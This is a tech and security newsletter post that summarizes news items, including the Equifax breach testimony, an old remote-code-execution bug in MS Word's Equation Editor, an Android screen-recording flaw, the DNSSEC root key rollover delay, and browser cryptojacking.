The Other Y2K Bug: It Still Lurks In Your MS Word And It allows Remote Code Execution


Weekly Axis Of Easy #26

 


In this issue:

  • Bruce Shneier  to congress: Equifax breach was huge and solely Equifax’s fault
  • Your financial advisor may soon be powered by Artificial Intelligence
  • The other Y2K bug: it still lurks in your MS Word and it allows Remote Code Execution
  • Root DNS Key Rollover postponed over concerns 20 million users would go dark
  • Android bug allows attackers to record your smartphone’s audio and screen
  • Latest craze in hacking is hijacking your CPU to mine crypto-currency 
  • How to claim your domain name on Ethereum’s ENS system

Bruce Shneier  to congress: Equifax breach was huge and solely Equifax’s fault

Renowned security expert and IBM Division CTO Bruce Shneier gave testimony to US Congress last week to offer insight into the now famous Equifax data breach. Mr. Shneier surmises that the breach put all exposed at risk of identity theft and was completely Equifax’s fault. Further, there are other data brokers out there with similar information who are also at risk in the future and the current regulatory environment is insufficient to the task.

Your financial advisor may soon be powered by Artificial Intelligence

Globe and Mail article about the increasing role of Artificial Intelligence in financial planning and investing. While the article posits it’s still 10 years off before these AI algos start making your investment decisions for you, recall that a couple weeks ago we mentioned the unveiling of AIEQ, the world’s first “AI driven ETF” (and it’s only down about one percent since it launched).

While I have personally switched away from being “an AI skeptic” about a year ago, I now think AI will happen; but I do not think AI will actually become conscious. That’s what it takes, IMHO to achieve market beating investment returns. We’ll probably find out sooner than any of us actually expect.

The other Y2K bug: it still lurks in your MS Word and it allows Remote Code Execution

An absolutely fascinating in-depth look at a Remote Code Execution bug in the Microsoft Equation Editor component of MS Word which has been sitting in there since the year 2000. It’s the EQNEDT32.EXE module which was used in the Microsoft Office versions 2000 and 2003. While the methodology used to render equations changed in the 2007 version of the software suite the faulty executable was left in the distribution. Where it remains to this day.

Android bug allows attackers to record your smartphone’s audio and screen

The Android service MediaProjection, which facilitates the capturing and recording of screen contents and audio has a security vulnerability that can be exploited by hackers, giving the attacker the ability to do same. The vulnerability affects smartphones running Lolipop, Marshmallow and Nougat.

Root DNS Key Rollover postponed over concerns 20 million users would go dark

The people who run the Internet, ICANN, have decided to postpone the DNSSEC root key rollover until the first quarter of 2018. The DNSSEC “Key Signing Key” is the key that signs the internet root zone which establishes the chain-of-trust from which all subsequent DNSSEC chains are tied. A survey of DNSSEC enabled resolvers showed that an unacceptably high number, a statistically high 6%, were improperly configured and would not be able to handle the rollover. Were that to happen, anybody using those resolvers would lose access to DNS resolution. It’s pretty hard to tell how many that would affect, but the number put to an estimate was 20 million users worldwide.

Latest craze in hacking is hijacking your CPU to mine crypto-currency 

Somebody came up with a way to mine crypto-currency in javascript and now it’s being used all over the place to hijack unsuspecting user’s CPUs. Granted, coin hive’s javascript code to mine monero is itself legitimate and above board. Intended to be used as an alternative way to monetize websites than running increasingly intrusive ads, when properly used it’s obvious to the user that it’s there, and either needs to be explicitly consented to or can be turned off. It even has a nifty “captcha” feature that can be used to force people to prove they’re not robots.

But it didn’t take long however for people to bypass those niceties and thus little javascript minero miners are popping up all over the place: in hacked websites, WordPress plugins, mobile apps, you name it. Most web protections software is now actively detecting and blocking it.

Also see: http://coinhive.com/

I’ve accelerated spinning up the Guerrilla Capitalism list and site. I’m hoping next week I’ll start putting out material there about disruptive technologies (including bitcoin) and how to compete against the 800lb Gorilla in your space. To get on the new newsletter’s list, sign up here.

Leave a Reply

Your email address will not be published. Required fields are marked *